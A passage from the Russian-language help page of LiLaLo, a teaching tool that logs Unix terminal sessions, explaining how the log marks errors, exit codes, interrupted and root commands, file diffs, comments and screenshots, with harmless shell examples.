    2. Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.

    3. Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
      $ l s-l
      bash: l: command not found
      

    4. Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
      $ test 5 -lt 4
      Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

    5. Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
      $ find / -name abc
      find: /home/devi-orig/.gnome2: Keine Berechtigung
      find: /home/devi-orig/.gnome2_private: Keine Berechtigung
      find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung
      find: /home/devi-orig/.metacity: Keine Berechtigung
      find: /home/devi-orig/.inkscape: Keine Berechtigung
      ^C
      

    6. Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
      # id
      uid=0(root) gid=0(root) Gruppen=0(root)
      

    7. Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
      $ vi ~/.bashrc
      2a3,5
      >    if [ -f /usr/local/etc/bash_completion ]; then
      >         . /usr/local/etc/bash_completion
      >        fi
      

    8. Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
      $ patch ~/.bashrc
      В данном случае изменения применяются к файлу ~/.bashrc

    9. Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.

      Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.

    10. Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.

    11. Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора

    12. Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.

    13. Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.

    14. Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:

      $ whoami
      
      user
      
      $ #^ Интересно, кто я?
      
      в журнале это будет выглядеть так:
      $ whoami
      
      user
      
      Интересно, кто я?

    15. Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:

      $ whoami
      
      user
      
      $ cat > /dev/null #^ Интересно, кто я?
      
      Программа whoami выводит имя пользователя, под которым 
      мы зарегистрировались в системе.
      -
      Она не может ответить на вопрос о нашем назначении 
      в этом мире.
      
      В журнале это будет выглядеть так:
      $ whoami
      user
      
      Интересно, кто я?
      Программа whoami выводит имя пользователя, под которым
      мы зарегистрировались в системе.

      Она не может ответить на вопрос о нашем назначении
      в этом мире.
      Для разделения нескольких абзацев между собой используйте символ "-", один в строке.

    16. Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=

    17. Содержимое файла может быть показано в журнале. Для этого его нужно вывести с помощью программы cat. Если вывод команды отметить симоволами #!, содержимое файла будет показано в журнале в специально отведённой для этого секции.
    18. Для того чтобы вставить скриншот интересующего вас окна в журнал, нужно воспользоваться командой l3shot. После того как команда вызвана, нужно с помощью мыши выбрать окно, которое должно быть в журнале.
    19. Команды в журнале расположены в хронологическом порядке. Если две команды давались одна за другой, но на разных терминалах, в журнале они будут рядом, даже если они не имеют друг к другу никакого отношения.
      1
          2
      3   
          4
      
      Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.

    О программе

    LiLaLo (L3) расшифровывается как Live Lab Log.
    Программа разработана для повышения эффективности обучения Unix/Linux-системам.
    (c) Игорь Чубин, 2004-2008

    $Id$